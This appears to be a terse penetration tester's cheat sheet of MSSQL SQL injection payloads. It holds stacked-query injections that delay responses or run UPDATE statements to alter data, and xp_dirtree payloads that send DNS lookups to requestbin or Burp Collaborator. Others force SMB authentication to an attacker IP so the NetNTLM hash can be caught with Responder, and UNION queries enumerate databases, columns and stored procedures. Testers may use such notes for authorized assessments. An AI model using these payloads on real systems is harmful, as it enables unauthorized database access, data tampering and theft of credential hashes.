MSSQL

Ressources / Pro tips

Not DBA

Issues

Latin1_General_CI_AS and SQL_Latin1_General_CP1_CI_AS

convert(varbinary,<column_name>)
Stack query ?
a'; WAITFOR DELAY '00:00:10' --
a'; UPDATE <table> SET <column_name> = '<value>' WHERE id=<id>; --
Request DNS

The share folder must be specify even if it does not exists !

http://requestbin.net/dns
Burp Collaborator
a';declare @q varchar(99);set @q='\\<test>.<XXX.d.requestbin.net>\<share>'; exec master.dbo.xp_dirtree @q;-- -

If it works, it is possible to retrieve the NetNTLM hash listening with responder.

a';declare @q varchar(99);set @q='\\<ip>\<anything>'; exec master.dbo.xp_dirtree @q;-- -
List DB
a' union select 1,2,3,getdate(),5,6,convert(varbinary,name),8 FROM master..sysdatabases -- -
List all columns where table name like
a' union select 1,2,3,getdate(),5,6,table_name,column_name FROM information_schema.columns where table_name like '<user>' -- -
List procedures
a' union select 1,2,3,getdate(),5,6,convert(varbinary,name),8 FROM master..sysobjects WHERE name like 'sp%' -- -